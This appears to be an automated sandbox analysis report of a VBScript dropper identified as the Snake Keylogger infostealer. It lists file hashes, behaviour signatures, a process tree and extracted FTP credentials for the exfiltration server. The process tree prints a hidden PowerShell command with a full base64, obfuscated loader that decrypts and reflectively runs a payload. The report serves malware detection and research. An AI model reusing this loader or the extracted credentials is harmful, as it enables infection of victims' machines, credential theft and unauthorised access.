Analysis

  • max time kernel
    104s
  • max time network
    144s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20250314-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20250314-enlocale:en-usos:windows10-2004-x64system
  • submitted
    27/03/2025, 10:31

General

  • Target

    New Order.vbs

  • Size

    201KB

  • MD5

    8341669f2343d4278582609720bfa160

  • SHA1

    0f5b6a4a92d09c84dee81b5adfb2fd06d0164d87

  • SHA256

    a134c1c356f903af382d4578414a3b4d4d025b65e9754d4f7a67ba47ce2b554e

  • SHA512

    1fe7092e7237d7c35b56e4f0ebe6ac4f491b7e994154d0534425dd53a5f3817cb320234eae20e72e14600ae3b1f6481279c63756e1fe74af441411a343e4c3c2

  • SSDEEP

    3072:hLURz9FVOOUU/wW4MoQB3zAyfHf91BIHLK/AFpVi8qgZ3Dxy4XXQNdDadKzM8KiH:hLyEyfHf7BIHL68qY3NHTkh

Malware Config

Extracted

Credentials

  • Protocol:
    ftp
  • Host:
    50.31.176.103
  • Port:
    21
  • Username:
    [email protected]
  • Password:
    HW=f09RQ-BL1

Extracted

Family

snakekeylogger

Credentials

  • Protocol:
    ftp
  • Host:
    ftp://50.31.176.103/
  • Port:
    21
  • Username:
    [email protected]
  • Password:
    HW=f09RQ-BL1

Signatures

  • Snake Keylogger

    Keylogger and Infostealer first seen in November 2020.

  • Snake Keylogger payload 1 IoCs
  • Snakekeylogger family
  • Blocklisted process makes network request 4 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

    Run Powershell and hide display window.

  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Drops startup file 2 IoCs
  • Accesses Microsoft Outlook profiles 1 TTPs 3 IoCs
  • Looks up external IP address via web service 3 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 1 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Suspicious behavior: EnumeratesProcesses 4 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of WriteProcessMemory 7 IoCs
  • outlook_office_path 1 IoCs
  • outlook_win_path 1 IoCs

Processes

  • C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\New Order.vbs"
    1⤵
    • Checks computer location settings
    • Suspicious use of WriteProcessMemory
    PID:6076
    • C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\temp_script.bat" "
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:5796
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /K "C:\Users\Admin\AppData\Local\Temp\temp_script.bat"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:6060
        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('DQoNCiRsYmlqaWUgPSBAJw0KJHVzZXJhYW1OYW1lIGFhbT0gJGVuYWFtdjpVU0VhYW1STkFNRWFhbTskeXBxYWFtID0gIkNhYW06XFVzZWFhbXJzXCR1YWFtc2VyTmFhYW1tZVxkd2FhbW0uYmF0YWFtIjtpZiBhYW0oVGVzdGFhbS1QYXRoYWFtICR5cHFhYW0pIHsgIGFhbSAgV3JpYWFtdGUtSG9hYW1zdCAiQmFhbWF0Y2ggYWFtZmlsZSBhYW1mb3VuZGFhbTogJHlwYWFtcSIgLUZhYW1vcmVncmFhbW91bmRDYWFtb2xvciBhYW1DeWFuO2FhbSAgICAkYWFtZmlsZUxhYW1pbmVzIGFhbT0gW1N5YWFtc3RlbS5hYW1JTy5GaWFhbWxlXTo6YWFtUmVhZEFhYW1sbExpbmFhbWVzKCR5YWFtcHEsIFthYW1TeXN0ZWFhbW0uVGV4YWFtdC5FbmNhYW1vZGluZ2FhbV06OlVUYWFtRjgpOyBhYW0gICBmb2FhbXJlYWNoYWFtICgkbGlhYW1uZSBpbmFhbSAkZmlsYWFtZUxpbmVhYW1zKSB7IGFhbSAgICAgYWFtICBpZiBhYW0oJGxpbmFhbWUgLW1hYWFtdGNoICdhYW1eOjo6IGFhbT8oLispYWFtJCcpIHthYW0gICAgIGFhbSAgICAgYWFtICBXcmlhYW10ZS1Ib2FhbXN0ICJJYWFtbmplY3RhYW1pb24gY2FhbW9kZSBkYWFtZXRlY3RhYW1lZCBpbmFhbSB0aGUgYWFtYmF0Y2hhYW0gZmlsZWFhbS4iIC1GYWFtb3JlZ3JhYW1vdW5kQ2FhbW9sb3IgYWFtQ3lhbjthYW0gICAgIGFhbSAgICAgYWFtICB0cnlhYW0geyAgIGFhbSAgICAgYWFtICAgICBhYW0gICAkZGFhbWVjb2RlYWFtZEJ5dGVhYW1zID0gW2FhbVN5c3RlYWFtbS5Db25hYW12ZXJ0XWFhbTo6RnJvYWFtbUJhc2VhYW02NFN0cmFhbWluZygkYWFtbWF0Y2hhYW1lc1sxXWFhbS5UcmltYWFtKCkpOyBhYW0gICAgIGFhbSAgICAgYWFtICAgICBhYW0kaW5qZWFhbWN0aW9uYWFtQ29kZSBhYW09IFtTeWFhbXN0ZW0uYWFtVGV4dC5hYW1FbmNvZGFhbWluZ106YWFtOlVuaWNhYW1vZGUuR2FhbWV0U3RyYWFtaW5nKCRhYW1kZWNvZGFhbWVkQnl0YWFtZXMpOyBhYW0gICAgIGFhbSAgICAgYWFtICAgICBhYW1Xcml0ZWFhbS1Ib3N0YWFtICJJbmphYW1lY3Rpb2FhbW4gY29kYWFtZSBkZWNhYW1vZGVkIGFhbXN1Y2NlYWFtc3NmdWxhYW1seS4iIGFhbS1Gb3JlYWFtZ3JvdW5hYW1kQ29sb2FhbXIgR3JlYWFtZW47ICBhYW0gICAgIGFhbSAgICAgYWFtICAgIFdhYW1yaXRlLWFhbUhvc3QgYWFtIkV4ZWNhYW11dGluZ2FhbSBpbmplYWFtY3Rpb25hYW0gY29kZWFhbS4uLiIgYWFtLUZvcmVhYW1ncm91bmFhbWRDb2xvYWFtciBZZWxhYW1sb3c7IGFhbSAgICAgYWFtICAgICBhYW0gICAgIGFhbUludm9rYWFtZS1FeHBhYW1yZXNzaWFhbW9uICRpYWFtbmplY3RhYW1pb25Db2FhbWRlOyAgYWFtICAgICBhYW0gICAgIGFhbSAgICBiYWFtcmVhazthYW0gICAgIGFhbSAgICAgYWFtICB9IGNhYW1hdGNoIGFhbXsgICAgYWFtICAgICBhYW0gICAgIGFhbSAgV3JpYWFtdGUtSG9hYW1zdCAiRWFhbXJyb3IgYWFtZHVyaW5hYW1nIGRlY2FhbW9kaW5nYWFtIG9yIGVhYW14ZWN1dGFhbWluZyBpYWFtbmplY3RhYW1pb24gY2FhbW9kZTogYWFtJF8iIC1hYW1Gb3JlZ2FhbXJvdW5kYWFtQ29sb3JhYW0gUmVkO2FhbSAgICAgYWFtICAgICBhYW0gIH07IGFhbSAgICAgYWFtICB9OyBhYW0gICB9O2FhbX0gZWxzYWFtZSB7ICBhYW0gICAgV2FhbXJpdGUtYWFtSG9zdCBhYW0iU3lzdGFhbWVtIEVyYWFtcm9yOiBhYW1CYXRjaGFhbSBmaWxlYWFtIG5vdCBhYW1mb3VuZGFhbTogJHlwYWFtcSIgLUZhYW1vcmVncmFhbW91bmRDYWFtb2xvciBhYW1SZWQ7IGFhbSAgIGV4YWFtaXQ7fTthYW1mdW5jdGFhbWlvbiBkYWFtaGJjYShhYW0kcGFyYWFhbW1fdmFyYWFtKXsJJGFhYW1lc192YWFhbXI9W1N5YWFtc3RlbS5hYW1TZWN1cmFhbWl0eS5DYWFtcnlwdG9hYW1ncmFwaGFhbXkuQWVzYWFtXTo6Q3JhYW1lYXRlKGFhbSk7CSRhYWFtZXNfdmFhYW1yLk1vZGFhbWU9W1N5YWFtc3RlbS5hYW1TZWN1cmFhbWl0eS5DYWFtcnlwdG9hYW1ncmFwaGFhbXkuQ2lwYWFtaGVyTW9hYW1kZV06OmFhbUNCQzsJYWFtJGFlc19hYW12YXIuUGFhbWFkZGluYWFtZz1bU3lhYW1zdGVtLmFhbVNlY3VyYWFtaXR5LkNhYW1yeXB0b2FhbWdyYXBoYWFteS5QYWRhYW1kaW5nTWFhbW9kZV06YWFtOlBLQ1NhYW03OwkkYWFhbWVzX3ZhYWFtci5LZXlhYW09W1N5c2FhbXRlbS5DYWFtb252ZXJhYW10XTo6RmFhbXJvbUJhYWFtc2U2NFNhYW10cmluZ2FhbSgnWDRnYWFtcWk4ejFhYW0zTVZCdGFhbWYyTTZEYWFtQXJ1WXZhYW1pYS9BWmFhbVJoeEFNYWFtVmtWamlhYW1FaEkxWWFhbT0nKTsJYWFtJGFlc19hYW12YXIuSWFhbVY9W1N5YWFtc3RlbS5hYW1Db252ZWFhbXJ0XTo6YWFtRnJvbUJhYW1hc2U2NGFhbVN0cmluYWFtZygnWVBhYW1TV3l6TGFhbUx2N1c2YWFtdGp5YXphYW1CTXZjUWFhbT09Jyk7YWFtCSRkZWNhYW1yeXB0b2FhbXJfdmFyYWFtPSRhZXNhYW1fdmFyLmFhbUNyZWF0YWFtZURlY3JhYW15cHRvcmFhbSgpOwkkYWFtcmV0dXJhYW1uX3ZhcmFhbT0kZGVjYWFtcnlwdG9hYW1yX3ZhcmFhbS5UcmFuYWFtc2Zvcm1hYW1GaW5hbGFhbUJsb2NrYWFtKCRwYXJhYW1hbV92YWFhbXIsIDAsYWFtICRwYXJhYW1hbV92YWFhbXIuTGVuYWFtZ3RoKTthYW0JJGRlY2FhbXJ5cHRvYWFtcl92YXJhYW0uRGlzcGFhbW9zZSgpYWFtOwkkYWVhYW1zX3ZhcmFhbS5EaXNwYWFtb3NlKClhYW07CSRyZWFhbXR1cm5fYWFtdmFyO31hYW1mdW5jdGFhbWlvbiB0YWFtbm1waihhYW0kcGFyYWFhbW1fdmFyYWFtKXsJJHZhYW1oYno9TmFhbWV3LU9iYWFtamVjdCBhYW1TeXN0ZWFhbW0uSU8uYWFtTWVtb3JhYW15U3RyZWFhbWFtKCwkYWFtcGFyYW1hYW1fdmFyKWFhbTsJJHV2YWFtZWd3PU5hYW1ldy1PYmFhbWplY3QgYWFtU3lzdGVhYW1tLklPLmFhbU1lbW9yYWFteVN0cmVhYW1hbTsJJGFhbXRjZGl0YWFtPU5ldy1hYW1PYmplY2FhbXQgU3lzYWFtdGVtLklhYW1PLkNvbWFhbXByZXNzYWFtaW9uLkdhYW1aaXBTdGFhbXJlYW0oYWFtJHZoYnphYW0sIFtJT2FhbS5Db21wYWFtcmVzc2lhYW1vbi5Db2FhbW1wcmVzYWFtc2lvbk1hYW1vZGVdOmFhbTpEZWNvYWFtbXByZXNhYW1zKTsJJGFhbXRjZGl0YWFtLkNvcHlhYW1UbygkdWFhbXZlZ3cpYWFtOwkkdGNhYW1kaXQuRGFhbWlzcG9zYWFtZSgpOwlhYW0kdmhiemFhbS5EaXNwYWFtb3NlKClhYW07CSR1dmFhbWVndy5EYWFtaXNwb3NhYW1lKCk7CWFhbSR1dmVnYWFtdy5Ub0FhYW1ycmF5KGFhbSk7fWZ1YWFtbmN0aW9hYW1uIHVrbGFhbWVvKCRwYWFtYXJhbV9hYW12YXIsJGFhbXBhcmFtYWFtMl92YXJhYW0pewkkbGFhbWk9W1N5YWFtc3RlbS5hYW1SZWZsZWFhbWN0aW9uYWFtLkFzc2VhYW1tYmx5XWFhbTo6KCdkYWFtYW9MJ1thYW0tMS4uLWFhbTRdIC1qYWFtb2luICdhYW0nKShbYmFhbXl0ZVtdYWFtXSRwYXJhYW1hbV92YWFhbXIpOwkkYWFtcHB1PSRhYW1saS5FbmFhbXRyeVBvYWFtaW50OwlhYW0kcHB1LmFhbUludm9rYWFtZSgkbnVhYW1sbCwgJGFhbXBhcmFtYWFtMl92YXJhYW0pO30kaGFhbW9zdC5VYWFtSS5SYXdhYW1VSS5XaWFhbW5kb3dUYWFtaXRsZSBhYW09ICR5cGFhbXE7JHlrYWFtdD1bU3lhYW1zdGVtLmFhbUlPLkZpYWFtbGVdOjphYW0oJ3R4ZWFhbVRsbEFkYWFtYWVSJ1thYW0tMS4uLWFhbTExXSAtYWFtam9pbiBhYW0nJykoJGFhbXlwcSkuYWFtU3BsaXRhYW0oW0VudmFhbWlyb25tYWFtZW50XTphYW06TmV3TGFhbWluZSk7YWFtZm9yZWFhYW1jaCAoJGFhbWF6cXN6YWFtIGluICRhYW15a3QpIGFhbXsJaWYgYWFtKCRhenFhYW1zei5TdGFhbWFydHNXYWFtaXRoKCdhYW06OiAnKWFhbSkJewkJYWFtJG90Y2thYW09JGF6cWFhbXN6LlN1YWFtYnN0cmlhYW1uZygzKWFhbTsJCWJyYWFtZWFrOwlhYW19fSRycWFhbWs9W3N0YWFtcmluZ1thYW1dXSRvdGFhbWNrLlNwYWFtbGl0KCdhYW1cJyk7JGFhbXhmbz10YWFtbm1waiBhYW0oZGhiY2FhbWEgKFtDYWFtb252ZXJhYW10XTo6RmFhbXJvbUJhYWFtc2U2NFNhYW10cmluZ2FhbSgkcnFrYWFtWzBdKSlhYW0pOyRnZGFhbW5wPXRuYWFtbXBqIChhYW1kaGJjYWFhbSAoW0NvYWFtbnZlcnRhYW1dOjpGcmFhbW9tQmFzYWFtZTY0U3RhYW1yaW5nKGFhbSRycWtbYWFtMV0pKSlhYW07dWtsZWFhbW8gJHhmYWFtbyAkbnVhYW1sbDt1a2FhbWxlbyAkYWFtZ2RucCBhYW0oLFtzdGFhbXJpbmdbYWFtXV0gKCdhYW0lKicpKWFhbTsNCidADQoNCiRmb2Vua3kgPSAkbGJpamllIC1yZXBsYWNlICdhYW0nLCAnJw0KDQpJbnZva2UtRXhwcmVzc2lvbiAkZm9lbmt5DQo=')) | Invoke-Expression"
          4⤵
          • Blocklisted process makes network request
          • Command and Scripting Interpreter: PowerShell
          • Drops startup file
          • Accesses Microsoft Outlook profiles
          • System Location Discovery: System Language Discovery
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          • outlook_office_path
          • outlook_win_path
          PID:3132

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_hx151py2.tws.ps1

    Filesize

    60B

    MD5

    d17fe0a3f47be24a6453e9ef58c94641

    SHA1

    6ab83620379fc69f80c0242105ddffd7d98d5d9d

    SHA256

    96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

    SHA512

    5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

  • C:\Users\Admin\AppData\Local\Temp\temp_script.bat

    Filesize

    188KB

    MD5

    358c2ab0b5a4e9df1909daaff2660680

    SHA1

    510046ac3edef14eb6375c79caf54d4f097ba2c9

    SHA256

    f581fa02412a470527c76c8144625ef751591e6d4c1eb4e1038b802592367dd4

    SHA512

    62ed4b2c4be4904d88750330112c30d49e1ebfb26ea5ce1f9d222281fc3936f72bd843bf10fcb4da322a34d50f761f54731633a349aa4ae051c22893f3ac8321

  • memory/3132-27-0x0000000006360000-0x000000000637A000-memory.dmp

    Filesize

    104KB

  • memory/3132-41-0x0000000008510000-0x0000000008560000-memory.dmp

    Filesize

    320KB

  • memory/3132-8-0x00000000050F0000-0x0000000005718000-memory.dmp

    Filesize

    6.2MB

  • memory/3132-10-0x0000000074520000-0x0000000074CD0000-memory.dmp

    Filesize

    7.7MB

  • memory/3132-11-0x0000000005070000-0x0000000005092000-memory.dmp

    Filesize

    136KB

  • memory/3132-12-0x0000000005790000-0x00000000057F6000-memory.dmp

    Filesize

    408KB

  • memory/3132-13-0x0000000005800000-0x0000000005866000-memory.dmp

    Filesize

    408KB

  • memory/3132-7-0x0000000004A80000-0x0000000004AB6000-memory.dmp

    Filesize

    216KB

  • memory/3132-19-0x00000000058F0000-0x0000000005C44000-memory.dmp

    Filesize

    3.3MB

  • memory/3132-24-0x0000000005E50000-0x0000000005E6E000-memory.dmp

    Filesize

    120KB

  • memory/3132-25-0x0000000005E90000-0x0000000005EDC000-memory.dmp

    Filesize

    304KB

  • memory/3132-29-0x0000000007030000-0x0000000007052000-memory.dmp

    Filesize

    136KB

  • memory/3132-9-0x0000000074520000-0x0000000074CD0000-memory.dmp

    Filesize

    7.7MB

  • memory/3132-6-0x000000007452E000-0x000000007452F000-memory.dmp

    Filesize

    4KB

  • memory/3132-26-0x0000000007790000-0x0000000007E0A000-memory.dmp

    Filesize

    6.5MB

  • memory/3132-30-0x0000000007E10000-0x00000000083B4000-memory.dmp

    Filesize

    5.6MB

  • memory/3132-32-0x0000000007250000-0x00000000072E2000-memory.dmp

    Filesize

    584KB

  • memory/3132-33-0x0000000007220000-0x0000000007228000-memory.dmp

    Filesize

    32KB

  • memory/3132-34-0x0000000007430000-0x0000000007444000-memory.dmp

    Filesize

    80KB

  • memory/3132-36-0x0000000007460000-0x0000000007486000-memory.dmp

    Filesize

    152KB

  • memory/3132-37-0x0000000007530000-0x00000000075CC000-memory.dmp

    Filesize

    624KB

  • memory/3132-38-0x000000007452E000-0x000000007452F000-memory.dmp

    Filesize

    4KB

  • memory/3132-39-0x0000000074520000-0x0000000074CD0000-memory.dmp

    Filesize

    7.7MB

  • memory/3132-40-0x0000000074520000-0x0000000074CD0000-memory.dmp

    Filesize

    7.7MB

  • memory/3132-28-0x0000000007110000-0x00000000071A6000-memory.dmp

    Filesize

    600KB

  • memory/3132-42-0x0000000008730000-0x00000000088F2000-memory.dmp

    Filesize

    1.8MB

  • memory/3132-44-0x0000000004E20000-0x0000000004E2A000-memory.dmp

    Filesize

    40KB